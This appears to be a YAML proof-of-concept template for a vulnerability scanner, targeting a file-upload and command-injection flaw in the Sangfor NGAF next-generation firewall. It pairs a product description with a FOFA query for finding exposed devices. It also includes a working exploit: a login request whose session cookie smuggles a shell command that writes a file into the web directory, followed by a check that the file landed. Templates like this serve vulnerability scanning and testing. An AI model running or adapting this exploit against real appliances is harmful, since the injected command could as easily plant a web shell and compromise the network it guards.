product: 深信服下一代防火墙NGAF
vName: 深信服下一代防火墙NGAF 任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 深信服下一代防火墙（Next-Generation Application Firewall）NGAF是面向应用层设计，能够精确识别用户、应用和内容，具备完整安全防护能力，能够全面替代传统防火墙，并具有强劲应用层处理能力的全新网络安全设备。NGAF解决了传统安全设备在应用识别、访问控制、内容安全防护等方面的不足，同时开启所有功能后性能不会大幅下降。区别于传统的网络层防火墙，NGAF具备L2-L7层的协议的理解能力。不仅能够实现网络层访问控制的功能，且能够对应用进行识别、控制、防护， 解决了传统防火墙应用层控制和防护能力不足的问题。区别于传统DPI技术的入侵防御系统，深信服NGAF具备深入应用内容的威胁分析能力，具备双向的内容检测能力为用户提供完整的应用层安全防护功能。 同样都能防护web攻击，与web应用防火墙关注web应用程序安全的设计理念不同，深信服下一代防火墙NGAF关注web系统在对外发布的过程中各个层面的安全问题，为对外发布系统打造坚实的防御体系。该系统存在任意文件上传漏洞。
version: ''
note: ''
search:
  FOFA: title="SANGFOR | NGAF"
protocol: http
link: https://cn-sec.com/archives/2170847.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /cgi-bin/login.cgi
      cookie: PHPSESSID=`$(echo '95cc64dd2825f9df13ec4ad683ecf339' > '/fwlib/sys/virus/webui/svpn_html/52e039302a62d077.txt')`
      json:
        dataJson:
          privacy_enable: '0'
          pwd: watchTowr
          user: watchTowr
          vericode: EINW
        opr: login
    verify:
      path: /svpn_html/52e039302a62d077.txt
      logic: and
      check:
        - body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and